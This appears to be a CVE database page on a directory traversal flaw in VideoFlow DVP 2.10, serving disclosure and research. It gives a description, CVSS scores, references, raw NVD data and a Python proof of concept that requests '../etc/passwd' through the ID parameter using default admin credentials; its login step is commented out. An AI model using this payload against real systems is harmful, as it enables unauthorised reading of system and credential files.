CVE-2019-25256

Description

VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows attackers to access arbitrary system files through unvalidated 'ID' parameters. Attackers can exploit multiple Perl scripts like downloadsys.pl to read sensitive files by manipulating directory path traversal in download requests.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

VideoFlow Digital Video Protection DVP 2.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2019-25256 PoC - Authenticated Directory Traversal in VideoFlow DVP
# Target: VideoFlow Digital Video Protection DVP 2.10

TARGET_URL = "http://target.com/cgi-bin/downloadsys.pl"
USERNAME = "admin"
PASSWORD = "admin"

# Create session and authenticate
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
# session.post(f"{TARGET_URL.replace('downloadsys.pl', 'login')}", data=login_data)

# Directory traversal payload to read /etc/passwd
payload = "../../../../../../etc/passwd"
params = {
    "ID": payload
}

print(f"[*] Sending malicious request to {TARGET_URL}")
print(f"[*] Payload: {payload}")

try:
    response = session.get(TARGET_URL, params=params, timeout=10)
    print(f"[*] Status Code: {response.status_code}")
    
    if response.status_code == 200:
        if "root:" in response.text or "/bin/" in response.text:
            print("[+] VULNERABLE! Sensitive file content leaked:")
            print(response.text[:500])
        else:
            print("[-] Response received but may not be the target file")
            print(response.text[:200])
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25256
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25256
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25256/
[4] VulDB https://vuldb.com/cve/CVE-2019-25256
[5] http://www.video-flow.com
[6] https://www.exploit-db.com/exploits/44386
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php
[8] http://www.video-flow.com
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25256", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:54.317", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VideoFlow Digital Video Protection DVP 2.10 contains an authenticated directory traversal vulnerability that allows attackers to access arbitrary system files through unvalidated 'ID' parameters. Attackers can exploit multiple Perl scripts like downloadsys.pl to read sensitive files by manipulating directory path traversal in download requests."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "http://www.video-flow.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44386", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php", "source": "[email protected]"}, {"url": "http://www.video-flow.com", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}